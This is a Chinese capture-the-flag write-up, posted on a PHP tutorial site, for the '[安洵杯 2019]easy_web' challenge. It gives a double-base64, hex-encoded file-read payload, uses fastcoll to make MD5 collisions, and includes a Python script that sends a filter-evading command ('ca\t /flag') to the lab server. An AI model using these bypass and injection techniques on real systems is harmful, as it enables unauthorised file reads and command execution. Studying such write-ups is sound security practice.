[PHP知识库] [安洵杯 2019]easy

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> [安洵杯 2019]easy_web -> 正文阅读

[PHP知识库][安洵杯 2019]easy_web

[安洵杯 2019]easy_web

在这里插入图片描述看到url出有类似于base的
两次解密之后
盲猜十六进制解密
这样可以查看index.php的内容
先将index.php进行十六进制编码之后base64加密两次

payload: TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

在这里插入图片描述获得源码base64 解密，

这个地方用MD5强碰撞用fastcoll生成payload

fastcoll_v1.0.0.5.exe 1.txt

在这里插入图片描述然后使用python写脚本发送数据

import urllib
import hashlib

f1 = open('1_msg1.txt','rb').read()
f2 = open('1_msg2.txt','rb').read()

data1 = f1
# data1 = urllib.quote(f1)
print(data1)
data2 = f2
# data2 = urllib.quote(f2)
print(data2)

import requests
# url = 'http://127.0.0.1/buu/mmd5.php'
url = 'http://e959cca5-366b-470e-bcab-fb92656d9b24.node4.buuoj.cn/index.php?img=1&cmd=ca\\t /flag'
data = {
    'a':data1,
    'b':data2
}
r = requests.post(url,data=data)
print(r.text)
# m= hashlib.md5()
# m.update(f1)
# print m.hexdigest()
#
# m.update(f2)
# print m.hexdigest()